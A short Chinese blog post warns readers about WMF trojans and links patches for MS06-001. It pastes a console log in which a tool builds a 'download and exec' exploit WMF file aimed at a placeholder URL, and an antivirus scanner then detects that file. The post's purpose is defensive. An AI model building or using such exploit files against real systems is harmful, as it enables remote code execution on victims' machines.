春节已经到眼前了,大家假期上网要小心WMF木马哦。这类木马已经有开始蔓延的趋势了。WMF木马相关资料,请参考下面文章:
要想不中毒,请安装WMF漏洞补丁:
官方补丁:http://www.microsoft.com/china/technet/Security/bulletin/ms06-001.mspx
第三方补丁:http://www.hexblog.com/2005/12/wmf_vuln.html
或者升级你的反病毒软件,上网时开启实时监控。目前,大多数AV都可以检测这些WMF木马(点击这里查看KV的测试结果)。
———– cut here————f:\wmf_maker>ms0601 http://xxx.xxx.xxx.xxx/xxx.exe
Microsoft Windows WMF Download and Exec Exploit
———————————————–
based on wmf_exp.wmf, shellcode from thc
shellc0de@2006Compiled by www.yibujh.com
[+] Using URL: http://xxx.xxx.xxx.xxx/xxx.exe
[+] Opening exploit.wmf: Ok!
[+] Writing Header: Ok!
[+] Writing Shellcode: Ok!
[+] Writing Nops: Ok!
[+] Writing Footer: Ok!
[+] Done!f:\wmf_maker>kv exploit.wmf
KVD3000 32bit version 9.000A, (c) Jiangmin, inc, 1998-2004Load kvlb\KVA.VLB….
Load kvlb\kvb.vlb…
Load kvlb\kvc.vlb…
Load kvlb\kvd.vlb…
Load kvlb\kve.vlb…
Load kvlb\kvf.vlb…
Load kvlb\kvg.vlb…
Load kvlb\kvh.vlb…
Load kvlb\kvi.vlb…
Load kvlb\kvj.vlb…
Load kvlb\KVK.VLB…
Load kvlb\kvl.vlb…
Load kvm.vlb…
Load kvlb\kvn.vlb…f:\wmf_maker\exploit.wmf found: Exploit.WMF.SetAbortProc
Total 1 files scaned.
Total 1 virus bodies found, 1 virus varieties, 0 warning
Total 0 exepack inspected, 0 files extracted from 0 compressed files.Scan time: 0:00:00
———– cut here————
本篇文章使用aigaogao Blog软件发布, “我的Blog要备份”
发表评论